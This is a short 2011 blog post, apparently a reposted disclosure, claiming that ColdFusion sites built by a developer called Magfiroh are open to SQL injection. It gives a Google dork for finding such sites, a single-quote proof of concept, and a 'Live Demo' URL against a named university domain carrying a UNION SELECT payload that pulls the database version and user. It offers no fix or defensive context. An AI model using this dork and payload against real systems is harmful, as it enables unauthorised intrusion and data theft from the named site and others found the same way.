Site Developed by Magfiroh Vulnerable to SQL Injection ~ Random stuff by yappare

Friday, April 15, 2011

Site Developed by Magfiroh Vulnerable to SQL Injection

on April 15, 2011 No comments

Title : Site Developed by Magfiroh Vulnerable to SQL Injection
Filetype : ColdFusion
Found by : p0pc0rn
Dork : inurl:".cfm?judul="

SQL
---

http://site.com/parameter.cfm?judul=[SQL]

POC
---

http://site.com/download_detail.cfm?judul=1'

Live Demo
---------

http://www.stiabinabanua.ac.id/download_detail.cfm?judul=30 UNION SELECT 1,2,version(),user(),5,6--

thanks,
-p0pc0rn-

Random stuff by yappare

Friday, April 15, 2011

Site Developed by Magfiroh Vulnerable to SQL Injection

0 comments:

Text Widget

Popular Posts

Pages

Blog Archive

Recent Posts

Unordered List

Categories